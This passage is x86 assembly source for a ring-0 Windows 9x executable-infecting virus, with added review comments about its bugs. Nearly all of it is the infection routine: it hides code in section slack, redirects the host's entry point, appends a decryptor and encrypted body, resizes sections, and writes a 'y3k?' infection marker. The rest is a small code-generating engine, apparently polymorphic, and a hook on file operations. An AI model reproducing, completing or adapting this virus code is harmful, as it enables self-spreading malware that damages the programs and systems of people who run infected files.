mov edx,'tad.' ; ".dat" -> matches ".data"
call GetSegmentSlack
test eax,eax
jz FileFunctionEndAddEsp
mov [DataObjectPtr+edi],ecx ; save offset of data object
push eax
push ebx
; Free .data space. NOTE(review): when .data is the last section this
; reads header offset PE_FileAlign+8 (= 68), which is not FileAlignment
; (60) despite the comment -- looks like an off-by-8.
.if (ecx==edx)
mov ebx,[PEHeadStart+edi]
mov eax,[ebx+PE_FileAlign+8] ; file align
.else
mov eax,[ecx+Obj_PhysicalSize] ; physical size
.endif
mov ebx,[ecx+Obj_VirtualSize] ; - virtual size
sub eax,ebx ; = free space
mov [SlackInDataSegment+edi],ebx
cmp eax,MemorySize*4 ; if this is true we can be
jg InfectFile ; 'sure' no bug will occure.
; Fallback: use the zero tail inside the section's raw data instead.
; The two pops below consume the push eax/push ebx above; "sub esp,8"
; re-reserves the same 8 bytes so that "add esp,8" at InfectFile is
; balanced on both paths.
add eax,ebx ; size of .data segment on
; disk
sub eax,MemorySize*4+10 ; some safety
pop ebx ; where in file the zero
add ebx,200h ; slack starts
sub eax,ebx
pop eax ; size of slack block
jc FileFunctionEndAddEsp
sub eax,250h+MemorySize*4 ; enough mem free
jc FileFunctionEndAddEsp ; this method is more risky
; will bug out if the
; infected program relies
; on the data to be cleared
sub esp,8
mov [SlackInDataSegment+edi],ebx
InfectFile:
add esp,8
mov [LastObjectPtr+edi],edx ; ptr to last object table
mov ecx,[PEHeadStart+edi]
mov edx,[ecx+PE_Entrypoint] ; save old RVA
mov [OldRVA+edi],edx
mov ecx,[CodeObjectPtr+edi]
mov ebx,[SlackInCodeSegment+edi]
BreakPoint:
mov eax,ebx ; ebx = how far in is free
; space
add ebx,[ecx+Obj_VirtualOffset] ; ebx = free space in mem
mov edx,[PEHeadStart+edi]
mov [edx+PE_Entrypoint],ebx ; save new RVA ; new entry point = guide in .text slack
add eax,[ecx+Obj_PhysicalOffset] ; eax = free space in file
mov [NewGuideOffset+edi],eax
; Build MemoryTable: MemorySize VAs (descending, 4 bytes apart) pointing
; into the host's .data slack; these are what GetOperand resolves 'S'
; variables to. Slot MemorySize holds the constant 0ch.
mov ecx,[DataObjectPtr+edi]
mov eax,[ecx+Obj_VirtualOffset] ; data space in mem
add eax,[SlackInDataSegment+edi] ; free data space in mem
add eax,(MemorySize-1)*4
add eax,[edx+PE_ImageBase] ; add with image base
mov ecx,MemorySize
mov ebx,[MemoryTable+edi]
mov edx,0ch
mov [ebx+ecx*4],edx ; used in fs:[0c]
sub ebx,4
CopyPointersToMem:
mov [ebx+ecx*4],eax
sub eax,4
dec ecx
jnz CopyPointersToMem
add ebx,4
mov [PointerToDataSlack+edi],ebx
; VirtualDataSegment (written to the host's .data slack below):
;   [0]  VA of the original entry point
;   [4]  VA of the .data slack itself
;   [8]  VA of the decryptor (end of the last section's raw data)
;   [12] VA where the encrypted body starts (= [8] + DecryptorSize)
mov ebx,[LastObjectPtr+edi]
mov eax,[VirtualDataSegment+edi]
mov ecx,[ebx+Obj_VirtualOffset] ; virtual offset
add ecx,[ebx+Obj_PhysicalSize] ; physical size
mov edx,[PEHeadStart+edi]
add ecx,[edx+PE_ImageBase] ; add with imagebase
mov [eax+8],ecx ; Decryptor Entrypoint
mov edx,[OldRVA+edi]
mov ebx,[PEHeadStart+edi]
add edx,[ebx+PE_ImageBase] ; add with image base
mov [eax],edx ; Program entrypoint
mov ebx,[DataObjectPtr+edi]
mov ecx,[ebx+Obj_VirtualOffset] ; Virtual offset
add ecx,[SlackInDataSegment+edi] ; Virtual offset of data slack
mov edx,[PEHeadStart+edi]
add ecx,[edx+PE_ImageBase] ; add with image base
mov [eax+4],ecx
mov ecx,[ebx+Obj_PhysicalOffset]
add ecx,[SlackInDataSegment+edi] ; Physical offset of data slack
mov [NewDataSegmentOffset+edi],ecx
mov ebx,[LastObjectPtr+edi]
mov ecx,[ebx+Obj_PhysicalSize] ; physical size
add ecx,[ebx+Obj_PhysicalOffset] ; physical offset
mov [NewDecryptorOffset+edi],ecx ; Entrypoint in file
mov edx,[eax+8] ; decryptor start
add edx,[DecryptorSize+edi]
mov [eax+12],edx ; save where to start decrypt
; write Guide
; Compile expects ebp = virus base, esi = textual source, edi = output.
; The byte count written is the precomputed [GuideSize]/[DecryptorSize],
; not the length Compile returns in eax.
pushad
mov esi,[GuidePos+edi]
mov eax,[GuideSize+edi]
add eax,100
; allocate mem for PEHeader
push eax
push R0_AllocMem
call vxd
pop ecx
test eax,eax
jz FileFunctionEndCloseFile ; NOTE(review): leaves pushad frame on the stack
mov [TempPtr+edi],eax
push edi
mov ebp,edi
mov edi,eax
call Compile
pop edi
mov edx,[NewGuideOffset+edi] ; write to
mov ecx,[GuideSize+edi] ; write ecx bytes
call FileIOWrite
mov eax,[TempPtr+edi]
push eax
push R0_FreeMem
call vxd
pop eax
mov esi,[DecryptorPos+edi]
mov eax,[DecryptorSize+edi]
add eax,100
; allocate mem for PEHeader
push eax
push R0_AllocMem
call vxd
pop ecx
test eax,eax
jz FileFunctionEndCloseFile ; NOTE(review): same stack imbalance as above
mov [TempPtr+edi],eax
push edi
mov ebp,edi
mov edi,eax
call Compile
pop edi
; write Decryptor
mov edx,[NewDecryptorOffset+edi]
mov ecx,[DecryptorSize+edi]
call FileIOWrite
mov eax,[TempPtr+edi]
push eax
push R0_FreeMem
call vxd
pop eax
popad
; Write the 4-dword VirtualDataSegment block (MemorySize*4 bytes are
; written) into the .data slack, then the body from ring-0 memory right
; after the decryptor. Whether VirusInRing0Mem is already encrypted at
; this point is not visible here.
mov edx,[NewDataSegmentOffset+edi]
mov ecx,MemorySize*4
mov esi,[VirtualDataSegment+edi]
call FileIOWrite
mov edx,[NewDecryptorOffset+edi]
add edx,[DecryptorSize+edi]
mov ecx,VSize
mov esi,[VirusInRing0Mem+edi]
call FileIOWrite
; Grow the last section: VirtualSize (only if larger) rounded up to
; SectionAlignment, SizeOfRawData rounded up to FileAlignment.
mov ebx,VSize
add ebx,[DecryptorSize+edi]
mov esi,[LastObjectPtr+edi]
mov eax,[esi+Obj_PhysicalSize] ; physical size
add eax,ebx ; add with new virussize
add eax,100 ; safety
mov edx,[PEHeadStart+edi]
mov ecx,[edx+PE_ObjectAlign] ; object align ; unchecked divisor from the host file
xor edx,edx
div ecx
inc eax
xor edx,edx
mul ecx
.if eax>[esi+8]
mov [esi+Obj_VirtualSize],eax ; save new virtual size
.endif
mov eax,[esi+Obj_PhysicalSize] ; physical size
add eax,ebx ; add with virus size
add eax,20 ; safety
mov edx,[PEHeadStart+edi]
mov ecx,[edx+PE_FileAlign] ; file align ; unchecked divisor from the host file
xor edx,edx
div ecx
inc eax
xor edx,edx
mul ecx
mov [esi+Obj_PhysicalSize],eax ; save new physical size
mov eax,'y3k?'
mov ecx,[PEHeadStart+edi]
mov [ecx+12],eax ; infection marker
mov eax,[LastObjectPtr+edi]
mov esi,0c0000040h ; last section -> initialized data, read, write
mov [eax+Obj_Flags],esi
mov eax,[ecx+PE_ImageSize] ; size of image
add eax,VirusSize ; add with virussize ; note: VirusSize here vs VSize above
mov ecx,[ecx+PE_ObjectAlign] ; object aligment
xor edx,edx
div ecx
inc eax
xor edx,edx
mul ecx ; new size of image in eax
mov esi,[PEHeadStart+edi]
mov [esi+PE_ImageSize],eax ; save it
mov edx,[PEHeadOfs+edi] ; write to
mov ecx,[HeaderSize+edi]
call FileIOWrite
; Despite its name this label does no esp adjustment: it frees the header
; buffer and falls into the close path.
FileFunctionEndAddEsp:
mov eax,[PEHeadStart+edi]
push eax
push R0_FreeMem
call vxd
pop eax
FileFunctionEndCloseFile:
mov eax,R0_CLOSEFILE
call FileIOHandle
FileFunctionEnd:
xor eax,eax
mov [edi+Flag], eax
; Chain to the previous hook with the original frame, then return to our
; caller through a self-patched "jmp rel32" (e9 + ReturnFromHook). The
; single ReturnFromHook slot is shared by nested invocations: a hook
; re-entry that happens while "call dword ptr [eax]" is executing
; overwrites the outer invocation's return target.
CallInOurFunction:
mov eax,[edi+OldAPIFunction]
mov ecx,edi
pop ebx
pop esi
pop edi
pop ebp
pop [ReturnFromHook+ecx]
lea edx,[ReturnFromHook+ecx+4]
sub [ReturnFromHook+ecx],edx ; rel32 = return address - (end of the jmp)
call dword ptr [eax]
db 0e9h
ReturnFromHook:
dd 0
; ------------------------------
; --------------------- Compiler
; ------------------------------
PointerToRandomMemory equ MemorySize
PointerToDataSlack dd 0 ; -> MemoryTable entries (VAs in the host's .data slack), set in InfectFile
SavedOffsets dd 10 dup (-1) ; output position of "offset" labels 0..9; -1 = not yet defined (single pass)
; Mnemonic lookup for ReadInstruction1. The index of the match selects the
; corresponding 8-byte entry in InstructionTables below (same order).
InstructionTable:
dd Op_add
dd Op_and
dd Op_cmp
dd Op_or
dd Op_sub
dd Op_xor
dd Op_mov
dd Op_jmp
dd Op_jnz
dd Op_jnb
dd Op_jna
dd Op_offset
dd Op_db
InstructionTableEnd:
; One 8-byte entry per mnemonic: dd handler, then 4 data bytes. For the
; ALU/mov handlers the bytes are, as consumed by DefaultProc1Label1 and
; MoveProc (byte index = FetchOpcode result, +1 for the 32-bit form):
;   [0] opcode for r/m,reg / reg,r/m
;   [1] opcode for r/m,imm32 (80h group, or C6h for mov)
;   [2] opcode for eax,imm32 (or B8h+reg for mov reg,imm32)
;   [3] ModRM /digit used with the 80h group
; Jxx entries hold the condition-code nibble in byte 0.
InstructionTables:
AddTable:
dd DefaultProc1
db 00000000b
db 10000000b
db 00000100b
db 000b
AndTable:
dd DefaultProc1
db 00100000b
db 10000000b
db 00100100b
db 100b
CmpTable:
dd DefaultProc1
db 00111000b
db 10000000b
db 00111100b
db 111b
OrTable:
dd DefaultProc1
db 00001000b
db 10000000b
db 00001100b
db 001b
SubTable:
dd DefaultProc1
db 00101000b
db 10000000b
db 00101100b
db 101b
XorTable:
dd DefaultProc1
db 00110000b
db 10000000b
db 00110100b
db 110b
MovTable:
dd MoveProc
db 10001000b
db 11000110b
db 10111000b
db 000b
JmpTable:
dd JmpProc
dd 0
JnzTable:
dd JxxProc
db 0101b
db 0,0,0
JnbTable:
dd JxxProc
db 0011b
db 0,0,0
JnaTable:
dd JxxProc
db 0110b
db 0,0,0
OffsetTable:
dd OffsetProc
dd 0
DeclareByteTable:
dd DeclareByteProc
dd 0
; Per-instruction compiler state: the two parsed operands (value + type
; code from GetOperand: 0 imm, 4 reg, 8 [abs], 12 [reg]), the encoded
; instruction bytes being assembled, and their length.
ToValue dd 0
ToTypeOfValue dd 0
SecondValue dd 0
SecondTypeOfValue dd 0
Instruction dd 0,0,0
InstructionLength dd 0
; Intel register numbers indexed by the engine's 1-based register index
; (index 0 unused). Note ebp is absent, so r/m=101 with mod=00 is always
; the disp32 form here.
RegistersBitValue:
dd 0
IntelEax dd 000b
IntelEbx dd 011b
IntelEcx dd 001b
IntelEdx dd 010b
IntelEsi dd 110b
IntelEdi dd 111b
IntelEsp dd 100b
; ReadInstruction1
; Advances esi to the next 16-byte slot, reads the mnemonic and dispatches
; to the handler from InstructionTables with ebx -> the entry's 4 data
; bytes. An unknown mnemonic (including the zero terminator slot) ends
; compilation by jumping to CompileEnd. The scan count is table size + 1
; so a hit on the last real entry (Op_db) still leaves ecx != 0.
ReadInstruction1:
push edi
lea edi,[InstructionTable+ebp]
mov ecx,(InstructionTableEnd-InstructionTable)/4+1
add esi,16
and esi,0fffffff0h
lodsd
bswap eax
push edi
repnz scasd
sub edi,[esp] ; (index+1)*4
shl edi,1 ; (index+1)*8
lea ebx,[edi+4-8+InstructionTables+ebp] ; -> data bytes of entry "index"
mov eax,[ebx-4] ; handler
add eax,ebp
pop edi
pop edi
test ecx,ecx
jz CompileEnd
jmp eax
; ReadOperands -- parse "op1[,op2]" at esi into ToValue/ToTypeOfValue and
; SecondValue/SecondTypeOfValue. If there is no comma the second pair is
; left as-is (stale from the previous instruction).
ReadOperands:
call GetOperand
mov [ToValue+ebp],eax
mov [ToTypeOfValue+ebp],ebx
mov al,byte ptr [esi]
cmp al,','
jnz Return
inc esi
call GetOperand
mov [SecondValue+ebp],eax
mov [SecondTypeOfValue+ebp],ebx
ret
; SetDirectionBit -- set opcode bit 1 (d = reg is destination) when the
; first operand's type is lower than the second's, i.e. reg <- mem.
SetDirectionBit:
call WhatOperandIsRegMem
setl bl
shl ebx,1
or [Instruction+ebp],ebx
ret
; GetRegMem returns the operand that becomes the ModRM r/m field (the one
; with the higher type code; the first operand on a tie), GetOther the
; remaining one. Out: eax = value, ebx = type code.
GetOther:
call WhatOperandIsRegMem
jnl Label40
mov eax,[ToValue+ebp]
mov ebx,[ToTypeOfValue+ebp]
ret
GetRegMem:
call WhatOperandIsRegMem
jl Label40
mov eax,[ToValue+ebp]
mov ebx,[ToTypeOfValue+ebp]
ret
Label40:
mov eax,[SecondValue+ebp]
mov ebx,[SecondTypeOfValue+ebp]
ret
; Encoding forms returned by FetchOpcode (= byte index into the table entry).
RegMem_Reg equ 0
RegMem_Immediate equ 1
Eax_Immediate equ 2
; FetchOpcode
; Out: eax = RegMem_Reg if the other operand is not an immediate,
;      Eax_Immediate if it is and the r/m operand is register #1 (eax),
;      RegMem_Immediate otherwise. Clobbers ebx, ecx.
FetchOpcode:
call GetRegMem
cmp ebx,4
setz bl
cmp eax,1
setz al
and eax,ebx
mov ecx,eax ; 1 iff r/m operand is the register eax
call GetOther
xor eax,eax
test ebx,ebx
jnz Return
inc eax
add eax,ecx
ret
; WhatOperandIsRegMem -- compare the two operand type codes (flags from
; "cmp ToType,SecondType"); ebx cleared for the setcc in the callers.
WhatOperandIsRegMem:
xor ebx,ebx
mov eax,[ToTypeOfValue+ebp]
cmp eax,[SecondTypeOfValue+ebp]
ret
; FixAddresses -- append the ModRM byte (and disp32 / imm32 as needed).
; r/m operand: type < 8 -> mod=11 + reg number; type 8 -> mod=00 r/m=101
; with a disp32 (the 'S' variable address); type 12 -> mod=00 r/m=reg.
; Other operand: register -> reg field; immediate -> imm32 appended after.
; Note r/m=100 with mod=00 means a SIB byte, so "[R7]" (esp) would not
; encode correctly -- whether the generator can emit that is not visible here.
FixAddresses:
lea edx,[Instruction+ebp]
add edx,[InstructionLength+ebp] ; edx -> ModRM position
call GetRegMem
xor ecx,ecx
cmp ebx,8
setl cl
imul ecx,ecx,3
shl ecx,6 ; mod = 11b for a register, 00b for memory
cmp ebx,8
jz MemoryValue
mov eax,[eax*4+RegistersBitValue+ebp]
or ecx,eax
jmp Label43
MemoryValue:
or ecx,101b ; disp32, no base
mov [edx+1],eax
add [InstructionLength+ebp],4
Label43:
inc [InstructionLength+ebp]
call GetOther
test ebx,ebx
jz LastOperandIsImmediate
mov eax,[eax*4+RegistersBitValue+ebp]
shl eax,3
or ecx,eax
mov byte ptr [edx],cl
ret
LastOperandIsImmediate:
push edx
lea edx,[Instruction+ebp]
add edx,[InstructionLength+ebp]
mov [edx],eax
add [InstructionLength+ebp],4
pop edx
or byte ptr [edx],cl ; OR (not mov): the /digit was already placed by DefaultProc1Label1
ret
; OutputInstruction -- copy the InstructionLength bytes assembled in
; Instruction to the output at edi. esi preserved.
OutputInstruction:
push esi
lea esi,[Instruction+ebp]
mov ecx,[InstructionLength+ebp]
rep movsb
pop esi
ret
; input
; Edi -> where to put compiled code
; Esi -> code to compile (16-byte textual slots, see OutputOnlyOpcode)
; ebp = virus base (all compiler state is ebp-relative)
; return
; eax = size of compiled code
; esi = where the compiled code starts (the original edi)
; (The original comment claimed eax = start / ebx = size; the code below
; computes eax = edi - start and leaves ebx as the last handler left it.)
; Each handler returns here; a C3 (ret) is written after the last emitted
; byte on every iteration so the stream is always terminated. The loop
; ends when ReadInstruction1 meets an unknown/zero mnemonic and jumps to
; CompileEnd, which also discards the pending return address.
Compile:
push edi
sub esi,16
CompileAgain:
mov [Instruction+ebp],0
mov [InstructionLength+ebp],0
call ReadInstruction1
mov al,0c3h
mov byte ptr [edi],al
jmp CompileAgain
CompileEnd:
pop esi ; return address of "call ReadInstruction1"
pop esi ; start of the output
mov eax,edi
sub eax,esi
ret
; "offset <digit>": record the current output position for label <digit>.
; Note jumps index SavedOffsets by a byte offset, so jump operands must
; already carry the ×4 value (see JumpIsIndirect / JxxProc).
OffsetProc:
call AsciiToNum
mov [SavedOffsets+ebp+eax*4],edi
ret
; "db": one count byte followed by that many raw bytes copied to the output
; (the form OutputPrefix produces).
DeclareByteProc:
xor eax,eax
lodsb
mov ecx,eax
rep movsb
ret
; MoveProc -- "mov" handler (ebx -> MovTable data bytes, pushed for
; DefaultProc1Label1). reg/mem forms and mem,imm32 (C7 /0) are delegated
; to the generic path; reg,imm32 is emitted directly as B8+reg imm32.
MoveProc:
push ebx
call ReadOperands
call SetDirectionBit
call FetchOpcode
test eax,eax
jz DefaultProc1Label1
call GetRegMem
mov ecx,eax
mov eax,1
cmp ebx,8
jz DefaultProc1Label1 ; memory destination: C6+1 /0 imm32 via the generic path
mov eax,[ecx*4+RegistersBitValue+ebp]
lea edx,[Instruction+ebp]
pop ebx
or al,byte ptr [ebx+2] ; B8h + reg
mov [edx],eax ; dword store is fine: Instruction was zeroed by Compile
call GetOther
mov [edx+1],eax ; imm32
mov [InstructionLength+ebp],5
jmp OutputInstruction
; DefaultProc1 -- generic two-operand ALU handler. Picks table byte
; [form] + 1 (32-bit operand size) as opcode; for r/m,imm32 also plants
; the /digit (byte 3) in the ModRM reg field; eax,imm32 gets just the
; imm32 appended; everything else goes through FixAddresses.
DefaultProc1:
push ebx
call ReadOperands
call SetDirectionBit
call FetchOpcode
DefaultProc1Label1:
pop ebx
add ebx,eax ; ebx -> opcode byte for this form
movzx ecx,byte ptr [ebx]
inc ecx
dec eax
jnz Label41
mov ch,byte ptr [ebx+2] ; form 1: table byte 3 = /digit, into ModRM.reg
shl ch,3
Label41:
or [Instruction+ebp],ecx
inc [InstructionLength+ebp]
dec eax
jz CopyDataToInstruction ; form 2 (eax,imm32)
call FixAddresses
jmp OutputInstruction
CopyDataToInstruction:
call GetOther
lea ebx,[Instruction+ebp]
add ebx,[InstructionLength+ebp]
mov [ebx],eax
add [InstructionLength+ebp],4
jmp OutputInstruction
;-JMP-------Jump
;Near,8-bit |1|1|1|0|1|0|1|1| 8-bit Displacement
;Near,Direct |1|1|1|0|1|0|0|1| Full Displacement
;Near,Indirect |1|1|1|1|1|1|1|1| |mod|1|0|0| R/M |
; JmpProc -- "jmp" handler.
; Register operand: emits FF 20h|reg, i.e. mod=00 -> "jmp dword ptr [reg]"
; (memory-indirect through the register, not "jmp reg"); whether that is
; the intent is not visible here.
; Label operand (JumpIsIndirect, misnamed): only a target within
; [edi-4, edi+3] reaches OutPutSmallJump -- and edx is not set on this
; path, so the condition nibble ORed in there is stale. Any other label
; target returns without emitting anything: the EB/E9 forms listed above
; are not implemented. Labels must be defined before use (SavedOffsets
; starts at -1).
JmpProc:
call GetOperand
xor ecx,ecx
test ebx,ebx
jz JumpIsIndirect
mov ebx,[eax*4+RegistersBitValue+ebp]
mov al,0ffh
stosb
mov eax,ebx
or eax,00100000b ; /4, mod=00
stosb
ret
JumpIsIndirect:
mov ebx,[SavedOffsets+ebp+eax] ; eax used as a byte offset (label*4)
sub ebx,edi
add ebx,4
test ebx,0fffffff8h
jz OutPutSmallJump
ret
; JxxProc -- conditional jump handler; edx = condition nibble from the
; table entry. ebx = target - edi + 4. When 0 <= ebx <= 7 (target within
; [edi-4, edi+3]) the short form 7x rel8 is used, rel8 = ebx-6 (target -
; end of the 2-byte instruction). Otherwise 0F 8x rel32 with rel32 =
; ebx-10 (end of the 6-byte instruction); this handles ordinary backward
; loop jumps. Forward references are not supported (SavedOffsets = -1).
; The operand value is used as a byte offset into SavedOffsets.
JxxProc:
movzx edx,byte ptr [ebx]
push edx
call GetOperand
pop edx
mov ebx,[SavedOffsets+ebp+eax]
sub ebx,edi
add ebx,4
test ebx,0fffffff8h
jz OutPutSmallJump
mov al,0fh
stosb
mov al,10000000b
or eax,edx ; 0F 80h+cc
stosb
sub ebx,6+4
mov eax,ebx
stosd
ret
OutPutSmallJump:
mov al,01110000b
or eax,edx ; 70h+cc
stosb
mov eax,ebx
sub eax,2+4
stosb
ret
ret ; unreachable
; GetOperand -- parse one textual operand at esi.
; Grammar: optional '[' ... ']', then one of
;   'S' + dword   variable: eax = [PointerToDataSlack][idx] (a VA in the
;                 host's .data slack), ebx = 8 if bracketed else 0
;   'R' + digit   register index; 'R' 'X' defers to GetRandomReg (defined
;                 outside this listing)
;   anything else is treated as 'N' + dword immediate (the tag byte is
;                 consumed but not validated)
; Out: eax = value, ebx = type code 0 imm / 4 reg / 8 [abs] / 12 [reg].
GetOperand:
xor edx,edx
mov al,byte ptr [esi]
cmp al,'['
setz dl
mov ecx,edx ; 1 = bracketed (skip the ']' at the end)
add esi,edx
shl edx,3
mov ebx,edx ; ebx = 0 or 8
lodsb
cmp al,'S' ; A variable
jnz Label53
mov edx,[PointerToDataSlack+ebp]
lodsd
mov eax,[edx+eax*4]
add esi,ecx
xor edx,edx
ret
Label53:
cmp al,'R'
setz dl
shl edx,2
add ebx,edx ; ebx = ebx + (0 or 4)
test edx,edx ; is value
jz ReadValue
xor eax,eax
lodsb ; read register
cmp al,'X'
jz GetRandomReg
sub eax,'0'
add esi,ecx
ret
ReadValue:
lodsd
add esi,ecx
ret
; Shared bare return target for conditional "jxx Return" exits.
Return:
ret
; AsciiToNum -- read one ASCII digit at esi into eax (no range check).
AsciiToNum:
xor eax,eax
lodsb
sub eax,'0'
ret
ResidentcodeEnd:
VirusEnd:
_rsrc ends
end Main